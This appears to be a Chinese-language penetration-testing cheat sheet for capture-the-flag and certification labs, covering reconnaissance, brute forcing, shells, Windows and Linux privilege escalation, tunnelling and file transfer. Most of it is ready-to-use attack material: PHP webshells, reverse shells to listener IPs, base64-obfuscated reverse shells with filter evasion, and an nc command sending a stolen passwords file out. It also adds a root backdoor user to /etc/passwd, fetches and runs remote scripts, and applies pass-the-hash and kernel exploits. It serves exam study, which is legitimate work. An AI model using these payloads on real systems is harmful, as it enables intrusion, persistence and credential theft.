‮

• 初期卡住看WP，看一步继续自己做
• 通关以后回看几个WP，看有没有新路子
• 有些exp试试改一下带不带URL最后/
• 有些端口连接要telnet和nc都试试
• 考试搜WP：关键词hack the box / tryhackme / ProvingGrounds
• 二进制程序先strings一下
• 看目录ls -al -R，windows里dir/a或tree /f，别漏隐藏文件
• 不明端口连上去输help试试
• 有wordpress的站打进去记得看数据库密码/var/www/html/wp-config.php

几个Payload页面：
Hack The Planet
Readme - PENETRATION NOTE
swisskyrepo/PayloadsAllTheThings

几个必备网站:
HackTricks - HackTricks
Exploit Database
GTFOBins
Online - Reverse Shell Generator

侦察

nmap

nmap --script vuln 192.168.146.60
nmap -sT -p- --min-rate 10000 10.129.138.220 

udp扫描
nmap -vvv -sU -o nmapudp 10.129.138.220 --max-retries 0
或者
nmap -sU --top-ports 10 -sV 10.129.228.106
具体udp
nmap -p 161,500 -sV -sU -sC 10.129.138.220

21 FTP

# 遍历下载
wget -m --no-passive ftp://anonymous:anonymous@192.168.186.145
wget -r -c -nH -np ftp://10.1.1.68/   --ftp-user=steph --ftp-password=billabong
# 直接查看
ftp> more xxxx

80 扫目录

gobuster dir -u http://192.168.146.71:7331/ -w /usr/share/wordlists/dirb/big.txt -t 500
gobuster dir -u http://192.168.146.54 -w /home/fazx/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

dirsearch -u http://192.168.234.143/ -r -R 2 -x 404 -w /usr/share/wordlists/dirb/big.txt

# new dict
/cgi-bin/admin.cgi
/api/heartbeat.php

80 FUZZ, API

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12 http://192.168.146.54/index.php?FUZZ=../location.txt

{GOBUSTER}/v1
{GOBUSTER}/v2
gobuster dir -u http://192.168.250.143 -w /usr/share/wordlists/dirb/big.txt -p pattern

80 wpscan

wpscan --url http://literally.vulnerable:65535/phpcms/ -t 20 --enumerate vt,vp,u (--passwords passwords)

80 hosts / cms

cmseek -u http://192.168.186.145/
whatweb http://192.168.50.244

echo "192.168.146.65    literally.vulnerable" >> /etc/hosts
有些资源加载不了，看F12改了hosts才行

135 RPC

rpcclient -U "" -N 192.168.186.145

for i in $(seq 500 1100); do
    rpcclient -N -U "" 192.168.186.145 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done

161 SNMP udp

snmp-check "192.168.233.145" -c public
snmpwalk -c public -v1 192.168.210.149
snmpbulkwalk -c public -v2c 10.10.11.136 .
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

445 smb

crackmapexec smb 192.168.186.145
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
crackmapexec smb ip -u 'anonymous' -p 'anonymous' --users

smbclient -N -L //192.168.186.145
smbclient -L //172.16.210.83/ -U medtech.com/wario --pw-nt-hash
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator

impacket-psexec -hashes 00000000000000000000000000000000:e728ecbadfb02f51ce8eed753f3ff3fd celia.almeda@10.10.140.142

1433 MSSQL

crackmapexec mssql ip -u sa -p pass --local-auth -x 'whoami'
impacket-mssqlclient sql_svc:Dolphin1@10.10.100.148 -windows-auth
sqsh -U sa -P poiuytrewq  -S 10.11.1.31:1433 

a'+or+'a'='a'+;exec+master..xp_cmdshell+'ping+192.168.119.169'--

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'

3389 RDP

连接

xfreerdp /u:test /p:123 /v:10.10.100.148 /cert:ignore -wallpaper /drive:kali,/root/Desktop/exp/temp

# 配置文件
/u:mac
/p:IAmTheGOATSysAdmin!
/v:192.168.126.221
/cert:ignore
/drive:kali,/root/Desktop/exp

开启RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net stop termservice && net start termservice

LFI

思路：可以读/etc/passwd看用户名，再去用户目录下读私钥/home/user/.ssh/id_rsa
argument name is like view, file, page, skin, theme, lang, template, file inclusion is highly possible

?page=php://filter/convert.base64-encode/resource=view.php

windows LFI files
https://notchxor.github.io/oscp-notes/4-win-privesc/15-LFI-FILES/

爆破

字典

/usr/share/dirb/wordlists/common.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wfuzz/wordlist/general/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Hydra

hydra -l pinky -P /usr/share/dirb/wordlists/common.txt 192.168.146.54 -s 7654 http-post-form '/login.php:user=^USER^&pass=^PASS^:F=Invalid'

hydra -l admin -P /home/fazx/SecLists/Passwords/2020-200_most_used_passwords.txt "ignition.htb" http-post-form "/admin:form_key=WaEWxk61HqTZyMVP&login%5Busername%5D=admin&login%5Bpassword%5D=^PASS^:please sign in" -V

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.146.55 ssh

hydra -L /usr/share/wordlists/chaoji/dic_username_ftp.txt -P /usr/share/wordlists/chaoji/dic_password_ftp.txt 192.168.146.80 ftp 

hydra 192.168.146.60 -P /usr/share/wordlists/rockyou.txt http-post-form '/kzMb5nVYJw/index.php:key=^PASS^:invalid' -la（相当于用户名随便输入个a）

hydra -l postgres -P /usr/share/wordlists/rockyou.txt 192.168.234.143 postgres

wpscan

wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ --proxy http://192.168.247.148:8080 --no-banner -U jerome -P /usr/share/wordlists/rockyou.txt

wpscan --url http://192.168.50.244 --enumerate ap --plugins-detection aggressive

aggressive模式可以扫出更多的插件, p是popular，vp vulnerable ，ap all

samba

枚举用户：
enum4linux -U 192.168.3.142
爆破密码
./acccheck.pl -t 192.168.3.142 -u smb -v
登陆查看
smbclient //192.168.3.142/smb -U smb

zip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sitebackup3.zip -v

zip2john sitebackup3.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt 

getshell

webshell

<?php system($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']);

UNION注入写shell

1' UNION SELECT 1,2,3,("<?php echo passthru($_GET['cmd']);") INTO OUTFILE '/var/www/html/tmp/123.php'#

反弹shell

https://www.revshells.com/
cme 执行powershell命令比较稳

# busybox shell捡漏nc -e / nc-c
busybox nc 192.168.146.55 8888 -e sh
# php一句话反弹
<?php $sock = fsockopen("192.168.146.55",8888); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
# windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=3306 -f exe > evil.exe 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.164 LPORT=21 -f exe > 21.exe

php -r ‘$sock=fsockopen(“192.168.146.58”,8888);exec(“/bin/sh -i <&3 >&3 2>&3”);’

echo "echo cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMTQ2LjU4Iiw4ODg4KTtwb3BlbigiL2Jpbi9iYXNoIDwmMyA+JjMgMj4mMyIsICJyIik7Jw== | base64 -d" >> ../write.sh

echo "php -r $sock=fsockopen("192.168.146.58",8888);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh

?plot=;curl http://192.168.86.99/rshell443.txt --output rshell443.php

nc 192.168.146.55 9999 | /bin/bash | nc 192.168.146.55 8888

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe > 443.exe

socat完全交互式shell

kali:   socat file:`tty`,raw,echo=0 tcp-listen:8888
靶机:./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.146.55:8888

python半交互式

//半交互shell，在靶机执行
python -c 'import pty; pty.spawn("/bin/bash")' 
python3 -c 'import pty; pty.spawn("/bin/bash")' 

stty升级完全交互式

//完全交互式
//Kali下装了GNOME的zsh终端会有问题，回车变成^M无法使用
//所以先输入bash回归普通终端
# In Kali
$ bash

# In reverse shell 
$ python -c 'import pty; pty.spawn("/bin/bash")' 
Ctrl-Z

# In Kali 
$ stty raw -echo 
$ fg 

# In reverse shell 
$ reset
如果询问Terminal type?可以输入xterm-256color，虽然但是vi可能会看不到字
所以一般就老实xterm或者dumb    (echo $TERM)

Windows提权

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry
https://benheater.com/thm-windows-privesc/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://zhuanlan.zhihu.com/p/428516577

先看权限

whoami /all

SeImpersonatePrivilege

PrintSpoofer64.exe -i -c cmd.exe
.\PrintSpoofer64.exe -i -c cmd.exe
PrintSpoofer64.exe -i -c "powershell.exe -e JABjAGwAa..."
certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"

看服务

certutil.exe -urlcache -split -f "http://192.168.45.164/PowerUp.ps1"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1;Invoke-AllChecks"

schtasks /query /fo LIST /v
icacls "%ProgramFiles%\RUXIM\PLUGscheduler.exe"

accesschk.exe /accepeula -uwcqv "user"

Service unquoted path

powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"  这个直接加用户了，方便  john/Password123!
Restart-Service GammaService

看漏洞

Winpeas

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"

AlwaysInstallElevated MSI Abuse

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

都为1时，普通用户执行MSI具有SYSTEM权限

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.79 LPORT=443 -f msi > ~/Desktop/exp/shell443.msi
直接执行msi就行，下面是静默安装命令
msiexec /quiet /qn /i C:\Temp\setup.msi

手动找其他信息

SauronEye.exe -d C:\Users\ --filetypes .txt .xml .conf .log --contents --keywords password
type C:\Users\wario\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

#查看ps的历史命令文件
dir /s /b "ConsoleHost_history.txt"

# ssh
reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys
reg query "HKCU\Software\OpenSSH\Agent\Key"

Linux提权

LinPEAS

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget http://192.168.146.55/linpeas.sh

Pspy

# 持续监测进程，弥补linpeas
wget https://hub.nuaa.cf/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

计划任务

grep "CRON" /var/log/cron.log
cat /etc/crontab

/etc/passwd

openssl passwd evil
echo "root2:EyCPXNrY/E2XE:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "root4::0:0::/root:/bin/bash" >> /etc/passwd
不能通过ssh登录，只能从已有shell su过去

SUID

#Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
(-perm 4000对应-rws)

# (可能需要有当前用户密码，这个在/etc/sudoers里定义
sudo -ll #Check commands you can execute with sudo
//list user's privileges or check a specific command; use twice for longer format

https://tttang.com/archive/1793/

特殊文件

可能出现看不到的计划任务，需要猜测改文件

# 查找对应用户的文件
find / -user demon 2>/dev/null | grep -Ev '/proc|/sys|/user'
find / -user www-data -ls 2>/dev/null | (grep -v proc)
# 查可写文件
find / -writable 2>/dev/null | grep -v proc
# 记得find -name是精确匹配
find / -name *penguin*

searchsploit

grep PRETTY /etc/os-release
searchsploit linux kernel ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
gcc 45010.c –o 45010

覆盖环境变量提权

cd /tmp
echo “/bin/sh” > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami

Pwnkit

https://github.com/arthepsy/CVE-2021-4034

user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc

It's all about the version.

According to https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py versions below these are vulnerable:
Ubuntu 20.04: 0.105-26ubuntu1.2
Ubuntu 21.10: 0.105-31ubuntu0.1
Ubuntu 18.04: 0.105-20ubuntu0.18.04.6
Debian stretch: 0.105-18+deb9u2
Debian buster: 0.105-25+deb10u1
Debian bullseye: 0.105-31+deb11u1

lxd提权

首先要在lxd group中，并且安装了lxc
https://reboare.github.io/lxd/lxd-escape.html
https://windsorwebdeveloper.com/web-developer-1-vulnhub-walkthrough/

ubuntu@ubuntu:~$ lxd init（都按默认一路回车）
ubuntu@ubuntu:~$ lxc init ubuntu:16.04 test -c security.privileged=true 
Creating test 
ubuntu@ubuntu:~$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true 
Device whatever added to test 
ubuntu@ubuntu:~$ lxc start test 
ubuntu@ubuntu:~$ lxc exec test bash 

NFS提权

首先要/etc/exports文件中写的文件夹权限是no_root_squash

(in Kali)
# showmount -e 192.168.146.60           
Export list for 192.168.146.60:
/home/user5 *
# mkdir nfstmp                                                                        
# mount -t nfs 192.168.146.60:/home/user5 nfstmp                        130 ⨯
# cd nfstmp                                                                                           
# cp /bin/sh ./nfsh
# chmod +s
(in target)
# ./sh -p

挂载共享后放个SUID文件再提权，实测这种方法不管是拷bash、编译c还是写python，都会产生文件euid和uid不相等的情况，这种情况下会实际以uid权限执行导致提权失败，因此sh要加-p参数不重置euid。

域内横向

(placeholder)

搭建隧道

kali上
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

kali:
./proxy -selfcert

靶机:
agentw64.exe -connect 192.168.119.166:11601 -ignore-cert 

kali:
>session
>ifconfig

另起一个命令行:
ip route add 10.10.56.0/24 dev ligolo    #10.10.56.0是要去往的那个网段

>start

>端口转发功能:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp 
将靶机的1234端口转发到kali的4321端口

listener_add --addr 127.0.0.1:80 --to 0.0.0.0:80 --tcp 
将kali的80端口转发到靶机的80端口

注意0.0.0.0 代表的就算agent地址
127.0.0.1 代表的是kali的地址，不需要换ip，直接用

文件相关

写文件

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D

cat > 2.txt <<EOF
this is test
this is test
this is test
EOF

写公钥

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdubHNkqPbAwD0ikkAKCWcEmxDNokB4gYle0ioj/NC/PA6wQjHRFOA32H/xGS1aGuTv3+xe9d7F4m6QuhZytNJ6QeVchqnf6zqg+0XlRyNxA3SUVxl2j+8fMgHeA92QqfWoIcknH/CaEWo5ZQTrSL4+A0hX2c7xMy2RyU4LEYxY3pEy9LayHmaqjHd3CKaeiDDDyEhSuGNPn1xPAOLB4h4idk88Ih50tu6rbl0hk/rEUCFYTTsWNtVy1u+uGAqimHv0xsYKQux1JLkymKYERXwTxSmNjK0Bx/d5IrI4oh4iUfnxqsvwcG6Sb6sKFwlhYypNgRr6zU3eZMltsSlc10j root@kali" > .ssh/authorized_keys

文件传输

nc.exe 192.168.45.201 80 < "C:\Users\offsec\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt"
nc -lp 80 > pass.txt

scp C:\windows.old\windows\system32\SAM root@10.10.100.147:/root/Desktop/

kali> impacket-smbserver myshare ./ -smb2
net use M: \\10.10.100.147:4455\myshare
cp a.exe M:

文件下载

certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"

查找文件内容

$ grep -R ".trash_old" /var/ 2>/dev/null
/var/spool/cron/crontabs/root:* * * * * /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

find / -type f | xargs grep tmp.py

其他

Python virtualenv

virtualenv .
source ./bin/active
./bin/deactivate

searchsploit

searchsploit -u # 更新库
searchsploit -m 50505 # 拷贝到本地
searchsploit -x 50505 # 查看exp内容

绕过

/bin/ech? bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMyA2NjY2ICAK|/u?r/b?n/b?se64 -d|/bin/?h

echo+YnVzeWJveCBuYyAxOTIuMTY4LjE0Ni41NSA4ODg4IC1lIC9iaW4vYmFzaA==+|+base64+-d|sh

-t 'bash --noprofile' 绕过rbash

base64

//加密命令
echo "ls -l" | base64

//解密命令并执行
echo bHMgLWwK | base64 -d | sh